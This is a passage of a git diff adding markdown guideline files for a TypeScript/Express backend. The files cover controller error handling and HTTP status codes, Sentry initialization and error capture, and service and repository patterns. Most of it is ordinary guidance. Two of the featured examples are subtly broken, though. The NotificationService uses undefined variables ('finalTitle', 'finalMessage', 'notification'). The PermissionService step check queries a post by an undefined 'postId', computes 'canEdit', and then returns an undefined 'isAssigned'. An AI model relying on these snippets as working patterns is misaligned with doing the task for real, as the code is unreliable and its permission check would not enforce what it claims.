|
### Custom Error Status Codes
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
async getUser(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
const user = await this.userService.findById(req.params.id);
|
||||||
|
|
||||||
|
if (!user) {
|
||||||
|
// Custom 404 status
|
||||||
|
return this.handleError(
|
||||||
|
new Error('User not found'),
|
||||||
|
res,
|
||||||
|
'getUser',
|
||||||
|
404 // Custom status code
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
this.handleSuccess(res, user);
|
||||||
|
} catch (error) {
|
||||||
|
this.handleError(error, res, 'getUser');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Validation Errors
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
async createUser(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
const validated = createUserSchema.parse(req.body);
|
||||||
|
const user = await this.userService.create(validated);
|
||||||
|
this.handleSuccess(res, user, 'User created', 201);
|
||||||
|
} catch (error) {
|
||||||
|
// Zod errors get 400 status
|
||||||
|
if (error instanceof z.ZodError) {
|
||||||
|
return this.handleError(error, res, 'createUser', 400);
|
||||||
|
}
|
||||||
|
this.handleError(error, res, 'createUser');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## HTTP Status Codes
|
||||||
|
|
||||||
|
### Standard Codes
|
||||||
|
|
||||||
|
| Code | Use Case | Example |
|
||||||
|
|------|----------|---------|
|
||||||
|
| 200 | Success (GET, PUT) | User retrieved, Updated |
|
||||||
|
| 201 | Created (POST) | User created |
|
||||||
|
| 204 | No Content (DELETE) | User deleted |
|
||||||
|
| 400 | Bad Request | Invalid input data |
|
||||||
|
| 401 | Unauthorized | Not authenticated |
|
||||||
|
| 403 | Forbidden | No permission |
|
||||||
|
| 404 | Not Found | Resource doesn't exist |
|
||||||
|
| 409 | Conflict | Duplicate resource |
|
||||||
|
| 422 | Unprocessable Entity | Validation failed |
|
||||||
|
| 500 | Internal Server Error | Unexpected error |
|
||||||
|
|
||||||
|
### Usage Examples
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// 200 - Success (default)
|
||||||
|
this.handleSuccess(res, user);
|
||||||
|
|
||||||
|
// 201 - Created
|
||||||
|
this.handleSuccess(res, user, 'Created', 201);
|
||||||
|
|
||||||
|
// 400 - Bad Request
|
||||||
|
this.handleError(error, res, 'operation', 400);
|
||||||
|
|
||||||
|
// 404 - Not Found
|
||||||
|
this.handleError(new Error('Not found'), res, 'operation', 404);
|
||||||
|
|
||||||
|
// 403 - Forbidden
|
||||||
|
this.handleError(new ForbiddenError('No permission'), res, 'operation', 403);
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Refactoring Guide
|
||||||
|
|
||||||
|
### Identify Routes Needing Refactoring
|
||||||
|
|
||||||
|
**Red Flags:**
|
||||||
|
- Route file > 100 lines
|
||||||
|
- Multiple try-catch blocks in one route
|
||||||
|
- Direct database access (Prisma calls)
|
||||||
|
- Complex business logic (if statements, loops)
|
||||||
|
- Permission checks in routes
|
||||||
|
|
||||||
|
**Check your routes:**
|
||||||
|
```bash
|
||||||
|
# Find large route files
|
||||||
|
wc -l form/src/routes/*.ts | sort -n
|
||||||
|
|
||||||
|
# Find routes with Prisma usage
|
||||||
|
grep -r "PrismaService" form/src/routes/
|
||||||
|
```
|
||||||
|
|
||||||
|
### Refactoring Process
|
||||||
|
|
||||||
|
**1. Extract to Controller:**
|
||||||
|
```typescript
|
||||||
|
// Before: Route with logic
|
||||||
|
router.post('/action', async (req, res) => {
|
||||||
|
try {
|
||||||
|
// 50 lines of logic
|
||||||
|
} catch (e) {
|
||||||
|
handler.handleException(res, e);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
// After: Clean route
|
||||||
|
router.post('/action', (req, res) => controller.performAction(req, res));
|
||||||
|
|
||||||
|
// New controller method
|
||||||
|
async performAction(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
const result = await this.service.performAction(req.body);
|
||||||
|
this.handleSuccess(res, result);
|
||||||
|
} catch (error) {
|
||||||
|
this.handleError(error, res, 'performAction');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**2. Extract to Service:**
|
||||||
|
```typescript
|
||||||
|
// Controller stays thin
|
||||||
|
async performAction(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
const validated = actionSchema.parse(req.body);
|
||||||
|
const result = await this.actionService.execute(validated);
|
||||||
|
this.handleSuccess(res, result);
|
||||||
|
} catch (error) {
|
||||||
|
this.handleError(error, res, 'performAction');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Service contains business logic
|
||||||
|
export class ActionService {
|
||||||
|
async execute(data: ActionDTO): Promise<Result> {
|
||||||
|
// All business logic here
|
||||||
|
// Permission checks
|
||||||
|
// Database operations
|
||||||
|
// Complex transformations
|
||||||
|
return result;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**3. Add Repository (if needed):**
|
||||||
|
```typescript
|
||||||
|
// Service calls repository
|
||||||
|
export class ActionService {
|
||||||
|
constructor(private actionRepository: ActionRepository) {}
|
||||||
|
|
||||||
|
async execute(data: ActionDTO): Promise<Result> {
|
||||||
|
// Business logic
|
||||||
|
const entity = await this.actionRepository.findById(data.id);
|
||||||
|
// More logic
|
||||||
|
return await this.actionRepository.update(data.id, changes);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Repository handles data access
|
||||||
|
export class ActionRepository {
|
||||||
|
async findById(id: number): Promise<Entity | null> {
|
||||||
|
return PrismaService.main.entity.findUnique({ where: { id } });
|
||||||
|
}
|
||||||
|
|
||||||
|
async update(id: number, data: Partial<Entity>): Promise<Entity> {
|
||||||
|
return PrismaService.main.entity.update({ where: { id }, data });
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
**Related Files:**
|
||||||
|
- [SKILL.md](SKILL.md) - Main guide
|
||||||
|
- [services-and-repositories.md](services-and-repositories.md) - Service layer details
|
||||||
|
- [complete-examples.md](complete-examples.md) - Full refactoring examples
|
||||||
336
skills/backend-dev-guidelines/resources/sentry-and-monitoring.md
Normal file
336
skills/backend-dev-guidelines/resources/sentry-and-monitoring.md
Normal file
@@ -0,0 +1,336 @@
|
|||||||
|
# Sentry Integration and Monitoring
|
||||||
|
|
||||||
|
Complete guide to error tracking and performance monitoring with Sentry v8.
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [Core Principles](#core-principles)
|
||||||
|
- [Sentry Initialization](#sentry-initialization)
|
||||||
|
- [Error Capture Patterns](#error-capture-patterns)
|
||||||
|
- [Performance Monitoring](#performance-monitoring)
|
||||||
|
- [Cron Job Monitoring](#cron-job-monitoring)
|
||||||
|
- [Error Context Best Practices](#error-context-best-practices)
|
||||||
|
- [Common Mistakes](#common-mistakes)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Core Principles
|
||||||
|
|
||||||
|
**MANDATORY**: All errors MUST be captured to Sentry. No exceptions.
|
||||||
|
|
||||||
|
**ALL ERRORS MUST BE CAPTURED** - Use Sentry v8 with comprehensive error tracking across all services.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Sentry Initialization
|
||||||
|
|
||||||
|
### instrument.ts Pattern
|
||||||
|
|
||||||
|
**Location:** `src/instrument.ts` (MUST be first import in server.ts and all cron jobs)
|
||||||
|
|
||||||
|
**Template for Microservices:**
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import * as Sentry from '@sentry/node';
|
||||||
|
import * as fs from 'fs';
|
||||||
|
import * as path from 'path';
|
||||||
|
import * as ini from 'ini';
|
||||||
|
|
||||||
|
const sentryConfigPath = path.join(__dirname, '../sentry.ini');
|
||||||
|
const sentryConfig = ini.parse(fs.readFileSync(sentryConfigPath, 'utf-8'));
|
||||||
|
|
||||||
|
Sentry.init({
|
||||||
|
dsn: sentryConfig.sentry?.dsn,
|
||||||
|
environment: process.env.NODE_ENV || 'development',
|
||||||
|
tracesSampleRate: parseFloat(sentryConfig.sentry?.tracesSampleRate || '0.1'),
|
||||||
|
profilesSampleRate: parseFloat(sentryConfig.sentry?.profilesSampleRate || '0.1'),
|
||||||
|
|
||||||
|
integrations: [
|
||||||
|
...Sentry.getDefaultIntegrations({}),
|
||||||
|
Sentry.extraErrorDataIntegration({ depth: 5 }),
|
||||||
|
Sentry.localVariablesIntegration(),
|
||||||
|
Sentry.requestDataIntegration({
|
||||||
|
include: {
|
||||||
|
cookies: false,
|
||||||
|
data: true,
|
||||||
|
headers: true,
|
||||||
|
ip: true,
|
||||||
|
query_string: true,
|
||||||
|
url: true,
|
||||||
|
user: { id: true, email: true, username: true },
|
||||||
|
},
|
||||||
|
}),
|
||||||
|
Sentry.consoleIntegration(),
|
||||||
|
Sentry.contextLinesIntegration(),
|
||||||
|
Sentry.prismaIntegration(),
|
||||||
|
],
|
||||||
|
|
||||||
|
beforeSend(event, hint) {
|
||||||
|
// Filter health checks
|
||||||
|
if (event.request?.url?.includes('/healthcheck')) {
|
||||||
|
return null;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Scrub sensitive headers
|
||||||
|
if (event.request?.headers) {
|
||||||
|
delete event.request.headers['authorization'];
|
||||||
|
delete event.request.headers['cookie'];
|
||||||
|
}
|
||||||
|
|
||||||
|
// Mask emails for PII
|
||||||
|
if (event.user?.email) {
|
||||||
|
event.user.email = event.user.email.replace(/^(.{2}).*(@.*)$/, '$1***$2');
|
||||||
|
}
|
||||||
|
|
||||||
|
return event;
|
||||||
|
},
|
||||||
|
|
||||||
|
ignoreErrors: [
|
||||||
|
/^Invalid JWT/,
|
||||||
|
/^JWT expired/,
|
||||||
|
'NetworkError',
|
||||||
|
],
|
||||||
|
});
|
||||||
|
|
||||||
|
// Set service context
|
||||||
|
Sentry.setTags({
|
||||||
|
service: 'form',
|
||||||
|
version: '1.0.1',
|
||||||
|
});
|
||||||
|
|
||||||
|
Sentry.setContext('runtime', {
|
||||||
|
node_version: process.version,
|
||||||
|
platform: process.platform,
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
**Critical Points:**
|
||||||
|
- PII protection built-in (beforeSend)
|
||||||
|
- Filter non-critical errors
|
||||||
|
- Comprehensive integrations
|
||||||
|
- Prisma instrumentation
|
||||||
|
- Service-specific tagging
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Error Capture Patterns
|
||||||
|
|
||||||
|
### 1. BaseController Pattern
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Use BaseController.handleError
|
||||||
|
protected handleError(error: unknown, res: Response, context: string, statusCode = 500): void {
|
||||||
|
Sentry.withScope((scope) => {
|
||||||
|
scope.setTag('controller', this.constructor.name);
|
||||||
|
scope.setTag('operation', context);
|
||||||
|
scope.setUser({ id: res.locals?.claims?.userId });
|
||||||
|
Sentry.captureException(error);
|
||||||
|
});
|
||||||
|
|
||||||
|
res.status(statusCode).json({
|
||||||
|
success: false,
|
||||||
|
error: { message: error instanceof Error ? error.message : 'Error occurred' }
|
||||||
|
});
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### 2. Workflow Error Handling
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import { SentryHelper } from '../utils/sentryHelper';
|
||||||
|
|
||||||
|
try {
|
||||||
|
await businessOperation();
|
||||||
|
} catch (error) {
|
||||||
|
SentryHelper.captureOperationError(error, {
|
||||||
|
operationType: 'POST_CREATION',
|
||||||
|
entityId: 123,
|
||||||
|
userId: 'user-123',
|
||||||
|
operation: 'createPost',
|
||||||
|
});
|
||||||
|
throw error;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### 3. Service Layer Error Handling
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
try {
|
||||||
|
await someOperation();
|
||||||
|
} catch (error) {
|
||||||
|
Sentry.captureException(error, {
|
||||||
|
tags: {
|
||||||
|
service: 'form',
|
||||||
|
operation: 'someOperation'
|
||||||
|
},
|
||||||
|
extra: {
|
||||||
|
userId: currentUser.id,
|
||||||
|
entityId: 123
|
||||||
|
}
|
||||||
|
});
|
||||||
|
throw error;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Performance Monitoring
|
||||||
|
|
||||||
|
### Database Performance Tracking
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import { DatabasePerformanceMonitor } from '../utils/databasePerformance';
|
||||||
|
|
||||||
|
const result = await DatabasePerformanceMonitor.withPerformanceTracking(
|
||||||
|
'findMany',
|
||||||
|
'UserProfile',
|
||||||
|
async () => {
|
||||||
|
return await PrismaService.main.userProfile.findMany({ take: 5 });
|
||||||
|
}
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
### API Endpoint Spans
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
router.post('/operation', async (req, res) => {
|
||||||
|
return await Sentry.startSpan({
|
||||||
|
name: 'operation.execute',
|
||||||
|
op: 'http.server',
|
||||||
|
attributes: {
|
||||||
|
'http.method': 'POST',
|
||||||
|
'http.route': '/operation'
|
||||||
|
}
|
||||||
|
}, async () => {
|
||||||
|
const result = await performOperation();
|
||||||
|
res.json(result);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Cron Job Monitoring
|
||||||
|
|
||||||
|
### Mandatory Pattern
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
#!/usr/bin/env node
|
||||||
|
import '../instrument'; // FIRST LINE after shebang
|
||||||
|
import * as Sentry from '@sentry/node';
|
||||||
|
|
||||||
|
async function main() {
|
||||||
|
return await Sentry.startSpan({
|
||||||
|
name: 'cron.job-name',
|
||||||
|
op: 'cron',
|
||||||
|
attributes: {
|
||||||
|
'cron.job': 'job-name',
|
||||||
|
'cron.startTime': new Date().toISOString(),
|
||||||
|
}
|
||||||
|
}, async () => {
|
||||||
|
try {
|
||||||
|
// Cron job logic here
|
||||||
|
} catch (error) {
|
||||||
|
Sentry.captureException(error, {
|
||||||
|
tags: {
|
||||||
|
'cron.job': 'job-name',
|
||||||
|
'error.type': 'execution_error'
|
||||||
|
}
|
||||||
|
});
|
||||||
|
console.error('[Cron] Error:', error);
|
||||||
|
process.exit(1);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
main().then(() => {
|
||||||
|
console.log('[Cron] Completed successfully');
|
||||||
|
process.exit(0);
|
||||||
|
}).catch((error) => {
|
||||||
|
console.error('[Cron] Fatal error:', error);
|
||||||
|
process.exit(1);
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Error Context Best Practices
|
||||||
|
|
||||||
|
### Rich Context Example
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
Sentry.withScope((scope) => {
|
||||||
|
// User context
|
||||||
|
scope.setUser({
|
||||||
|
id: user.id,
|
||||||
|
email: user.email,
|
||||||
|
username: user.username
|
||||||
|
});
|
||||||
|
|
||||||
|
// Tags for filtering
|
||||||
|
scope.setTag('service', 'form');
|
||||||
|
scope.setTag('endpoint', req.path);
|
||||||
|
scope.setTag('method', req.method);
|
||||||
|
|
||||||
|
// Structured context
|
||||||
|
scope.setContext('operation', {
|
||||||
|
type: 'workflow.complete',
|
||||||
|
workflowId: 123,
|
||||||
|
stepId: 456
|
||||||
|
});
|
||||||
|
|
||||||
|
// Breadcrumbs for timeline
|
||||||
|
scope.addBreadcrumb({
|
||||||
|
category: 'workflow',
|
||||||
|
message: 'Starting step completion',
|
||||||
|
level: 'info',
|
||||||
|
data: { stepId: 456 }
|
||||||
|
});
|
||||||
|
|
||||||
|
Sentry.captureException(error);
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Common Mistakes
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ❌ Swallowing errors
|
||||||
|
try {
|
||||||
|
await riskyOperation();
|
||||||
|
} catch (error) {
|
||||||
|
// Silent failure
|
||||||
|
}
|
||||||
|
|
||||||
|
// ❌ Generic error messages
|
||||||
|
throw new Error('Error occurred');
|
||||||
|
|
||||||
|
// ❌ Exposing sensitive data
|
||||||
|
Sentry.captureException(error, {
|
||||||
|
extra: { password: user.password } // NEVER
|
||||||
|
});
|
||||||
|
|
||||||
|
// ❌ Missing async error handling
|
||||||
|
async function bad() {
|
||||||
|
fetchData().then(data => processResult(data)); // Unhandled
|
||||||
|
}
|
||||||
|
|
||||||
|
// ✅ Proper async handling
|
||||||
|
async function good() {
|
||||||
|
try {
|
||||||
|
const data = await fetchData();
|
||||||
|
processResult(data);
|
||||||
|
} catch (error) {
|
||||||
|
Sentry.captureException(error);
|
||||||
|
throw error;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
**Related Files:**
|
||||||
|
- [SKILL.md](SKILL.md)
|
||||||
|
- [routing-and-controllers.md](routing-and-controllers.md)
|
||||||
|
- [async-and-errors.md](async-and-errors.md)
|
||||||
@@ -0,0 +1,789 @@
|
|||||||
|
# Services and Repositories - Business Logic Layer
|
||||||
|
|
||||||
|
Complete guide to organizing business logic with services and data access with repositories.
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [Service Layer Overview](#service-layer-overview)
|
||||||
|
- [Dependency Injection Pattern](#dependency-injection-pattern)
|
||||||
|
- [Singleton Pattern](#singleton-pattern)
|
||||||
|
- [Repository Pattern](#repository-pattern)
|
||||||
|
- [Service Design Principles](#service-design-principles)
|
||||||
|
- [Caching Strategies](#caching-strategies)
|
||||||
|
- [Testing Services](#testing-services)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Service Layer Overview
|
||||||
|
|
||||||
|
### Purpose of Services
|
||||||
|
|
||||||
|
**Services contain business logic** - the 'what' and 'why' of your application:
|
||||||
|
|
||||||
|
```
|
||||||
|
Controller asks: "Should I do this?"
|
||||||
|
Service answers: "Yes/No, here's why, and here's what happens"
|
||||||
|
Repository executes: "Here's the data you requested"
|
||||||
|
```
|
||||||
|
|
||||||
|
**Services are responsible for:**
|
||||||
|
- ✅ Business rules enforcement
|
||||||
|
- ✅ Orchestrating multiple repositories
|
||||||
|
- ✅ Transaction management
|
||||||
|
- ✅ Complex calculations
|
||||||
|
- ✅ External service integration
|
||||||
|
- ✅ Business validations
|
||||||
|
|
||||||
|
**Services should NOT:**
|
||||||
|
- ❌ Know about HTTP (Request/Response)
|
||||||
|
- ❌ Direct Prisma access (use repositories)
|
||||||
|
- ❌ Handle route-specific logic
|
||||||
|
- ❌ Format HTTP responses
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Dependency Injection Pattern
|
||||||
|
|
||||||
|
### Why Dependency Injection?
|
||||||
|
|
||||||
|
**Benefits:**
|
||||||
|
- Easy to test (inject mocks)
|
||||||
|
- Clear dependencies
|
||||||
|
- Flexible configuration
|
||||||
|
- Promotes loose coupling
|
||||||
|
|
||||||
|
### Excellent Example: NotificationService
|
||||||
|
|
||||||
|
**File:** `/blog-api/src/services/NotificationService.ts`
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Define dependencies interface for clarity
|
||||||
|
export interface NotificationServiceDependencies {
|
||||||
|
prisma: PrismaClient;
|
||||||
|
batchingService: BatchingService;
|
||||||
|
emailComposer: EmailComposer;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Service with dependency injection
|
||||||
|
export class NotificationService {
|
||||||
|
private prisma: PrismaClient;
|
||||||
|
private batchingService: BatchingService;
|
||||||
|
private emailComposer: EmailComposer;
|
||||||
|
private preferencesCache: Map<string, { preferences: UserPreference; timestamp: number }> = new Map();
|
||||||
|
private CACHE_TTL = (notificationConfig.preferenceCacheTTLMinutes || 5) * 60 * 1000;
|
||||||
|
|
||||||
|
// Dependencies injected via constructor
|
||||||
|
constructor(dependencies: NotificationServiceDependencies) {
|
||||||
|
this.prisma = dependencies.prisma;
|
||||||
|
this.batchingService = dependencies.batchingService;
|
||||||
|
this.emailComposer = dependencies.emailComposer;
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Create a notification and route it appropriately
|
||||||
|
*/
|
||||||
|
async createNotification(params: CreateNotificationParams) {
|
||||||
|
const { recipientID, type, title, message, link, context = {}, channel = 'both', priority = NotificationPriority.NORMAL } = params;
|
||||||
|
|
||||||
|
try {
|
||||||
|
// Get template and render content
|
||||||
|
const template = getNotificationTemplate(type);
|
||||||
|
const rendered = renderNotificationContent(template, context);
|
||||||
|
|
||||||
|
// Create in-app notification record
|
||||||
|
const notificationId = await createNotificationRecord({
|
||||||
|
instanceId: parseInt(context.instanceId || '0', 10),
|
||||||
|
template: type,
|
||||||
|
recipientUserId: recipientID,
|
||||||
|
channel: channel === 'email' ? 'email' : 'inApp',
|
||||||
|
contextData: context,
|
||||||
|
title: finalTitle,
|
||||||
|
message: finalMessage,
|
||||||
|
link: finalLink,
|
||||||
|
});
|
||||||
|
|
||||||
|
// Route notification based on channel
|
||||||
|
if (channel === 'email' || channel === 'both') {
|
||||||
|
await this.routeNotification({
|
||||||
|
notificationId,
|
||||||
|
userId: recipientID,
|
||||||
|
type,
|
||||||
|
priority,
|
||||||
|
title: finalTitle,
|
||||||
|
message: finalMessage,
|
||||||
|
link: finalLink,
|
||||||
|
context,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
return notification;
|
||||||
|
} catch (error) {
|
||||||
|
ErrorLogger.log(error, {
|
||||||
|
context: {
|
||||||
|
'[NotificationService] createNotification': {
|
||||||
|
type: params.type,
|
||||||
|
recipientID: params.recipientID,
|
||||||
|
},
|
||||||
|
},
|
||||||
|
});
|
||||||
|
throw error;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Route notification based on user preferences
|
||||||
|
*/
|
||||||
|
private async routeNotification(params: { notificationId: number; userId: string; type: string; priority: NotificationPriority; title: string; message: string; link?: string; context?: Record<string, any> }) {
|
||||||
|
// Get user preferences with caching
|
||||||
|
const preferences = await this.getUserPreferences(params.userId);
|
||||||
|
|
||||||
|
// Check if we should batch or send immediately
|
||||||
|
if (this.shouldBatchEmail(preferences, params.type, params.priority)) {
|
||||||
|
await this.batchingService.queueNotificationForBatch({
|
||||||
|
notificationId: params.notificationId,
|
||||||
|
userId: params.userId,
|
||||||
|
userPreference: preferences,
|
||||||
|
priority: params.priority,
|
||||||
|
});
|
||||||
|
} else {
|
||||||
|
// Send immediately via EmailComposer
|
||||||
|
await this.sendImmediateEmail({
|
||||||
|
userId: params.userId,
|
||||||
|
title: params.title,
|
||||||
|
message: params.message,
|
||||||
|
link: params.link,
|
||||||
|
context: params.context,
|
||||||
|
type: params.type,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Determine if email should be batched
|
||||||
|
*/
|
||||||
|
shouldBatchEmail(preferences: UserPreference, notificationType: string, priority: NotificationPriority): boolean {
|
||||||
|
// HIGH priority always immediate
|
||||||
|
if (priority === NotificationPriority.HIGH) {
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check batch mode
|
||||||
|
const batchMode = preferences.emailBatchMode || BatchMode.IMMEDIATE;
|
||||||
|
return batchMode !== BatchMode.IMMEDIATE;
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Get user preferences with caching
|
||||||
|
*/
|
||||||
|
async getUserPreferences(userId: string): Promise<UserPreference> {
|
||||||
|
// Check cache first
|
||||||
|
const cached = this.preferencesCache.get(userId);
|
||||||
|
if (cached && Date.now() - cached.timestamp < this.CACHE_TTL) {
|
||||||
|
return cached.preferences;
|
||||||
|
}
|
||||||
|
|
||||||
|
const preference = await this.prisma.userPreference.findUnique({
|
||||||
|
where: { userID: userId },
|
||||||
|
});
|
||||||
|
|
||||||
|
const finalPreferences = preference || DEFAULT_PREFERENCES;
|
||||||
|
|
||||||
|
// Update cache
|
||||||
|
this.preferencesCache.set(userId, {
|
||||||
|
preferences: finalPreferences,
|
||||||
|
timestamp: Date.now(),
|
||||||
|
});
|
||||||
|
|
||||||
|
return finalPreferences;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**Usage in Controller:**
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Instantiate with dependencies
|
||||||
|
const notificationService = new NotificationService({
|
||||||
|
prisma: PrismaService.main,
|
||||||
|
batchingService: new BatchingService(PrismaService.main),
|
||||||
|
emailComposer: new EmailComposer(),
|
||||||
|
});
|
||||||
|
|
||||||
|
// Use in controller
|
||||||
|
const notification = await notificationService.createNotification({
|
||||||
|
recipientID: 'user-123',
|
||||||
|
type: 'AFRLWorkflowNotification',
|
||||||
|
context: { workflowName: 'AFRL Monthly Report' },
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
**Key Takeaways:**
|
||||||
|
- Dependencies passed via constructor
|
||||||
|
- Clear interface defines required dependencies
|
||||||
|
- Easy to test (inject mocks)
|
||||||
|
- Encapsulated caching logic
|
||||||
|
- Business rules isolated from HTTP
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Singleton Pattern
|
||||||
|
|
||||||
|
### When to Use Singletons
|
||||||
|
|
||||||
|
**Use for:**
|
||||||
|
- Services with expensive initialization
|
||||||
|
- Services with shared state (caching)
|
||||||
|
- Services accessed from many places
|
||||||
|
- Permission services
|
||||||
|
- Configuration services
|
||||||
|
|
||||||
|
### Example: PermissionService (Singleton)
|
||||||
|
|
||||||
|
**File:** `/blog-api/src/services/permissionService.ts`
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import { PrismaClient } from '@prisma/client';
|
||||||
|
|
||||||
|
class PermissionService {
|
||||||
|
private static instance: PermissionService;
|
||||||
|
private prisma: PrismaClient;
|
||||||
|
private permissionCache: Map<string, { canAccess: boolean; timestamp: number }> = new Map();
|
||||||
|
private CACHE_TTL = 5 * 60 * 1000; // 5 minutes
|
||||||
|
|
||||||
|
// Private constructor prevents direct instantiation
|
||||||
|
private constructor() {
|
||||||
|
this.prisma = PrismaService.main;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Get singleton instance
|
||||||
|
public static getInstance(): PermissionService {
|
||||||
|
if (!PermissionService.instance) {
|
||||||
|
PermissionService.instance = new PermissionService();
|
||||||
|
}
|
||||||
|
return PermissionService.instance;
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Check if user can complete a workflow step
|
||||||
|
*/
|
||||||
|
async canCompleteStep(userId: string, stepInstanceId: number): Promise<boolean> {
|
||||||
|
const cacheKey = `${userId}:${stepInstanceId}`;
|
||||||
|
|
||||||
|
// Check cache
|
||||||
|
const cached = this.permissionCache.get(cacheKey);
|
||||||
|
if (cached && Date.now() - cached.timestamp < this.CACHE_TTL) {
|
||||||
|
return cached.canAccess;
|
||||||
|
}
|
||||||
|
|
||||||
|
try {
|
||||||
|
const post = await this.prisma.post.findUnique({
|
||||||
|
where: { id: postId },
|
||||||
|
include: {
|
||||||
|
author: true,
|
||||||
|
comments: {
|
||||||
|
include: {
|
||||||
|
user: true,
|
||||||
|
},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
if (!post) {
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check if user has permission
|
||||||
|
const canEdit = post.authorId === userId ||
|
||||||
|
await this.isUserAdmin(userId);
|
||||||
|
|
||||||
|
// Cache result
|
||||||
|
this.permissionCache.set(cacheKey, {
|
||||||
|
canAccess: isAssigned,
|
||||||
|
timestamp: Date.now(),
|
||||||
|
});
|
||||||
|
|
||||||
|
return isAssigned;
|
||||||
|
} catch (error) {
|
||||||
|
console.error('[PermissionService] Error checking step permission:', error);
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Clear cache for user
|
||||||
|
*/
|
||||||
|
clearUserCache(userId: string): void {
|
||||||
|
for (const [key] of this.permissionCache) {
|
||||||
|
if (key.startsWith(`${userId}:`)) {
|
||||||
|
this.permissionCache.delete(key);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Clear all cache
|
||||||
|
*/
|
||||||
|
clearCache(): void {
|
||||||
|
this.permissionCache.clear();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Export singleton instance
|
||||||
|
export const permissionService = PermissionService.getInstance();
|
||||||
|
```
|
||||||
|
|
||||||
|
**Usage:**
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import { permissionService } from '../services/permissionService';
|
||||||
|
|
||||||
|
// Use anywhere in the codebase
|
||||||
|
const canComplete = await permissionService.canCompleteStep(userId, stepId);
|
||||||
|
|
||||||
|
if (!canComplete) {
|
||||||
|
throw new ForbiddenError('You do not have permission to complete this step');
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Repository Pattern
|
||||||
|
|
||||||
|
### Purpose of Repositories
|
||||||
|
|
||||||
|
**Repositories abstract data access** - the 'how' of data operations:
|
||||||
|
|
||||||
|
```
|
||||||
|
Service: "Get me all active users sorted by name"
|
||||||
|
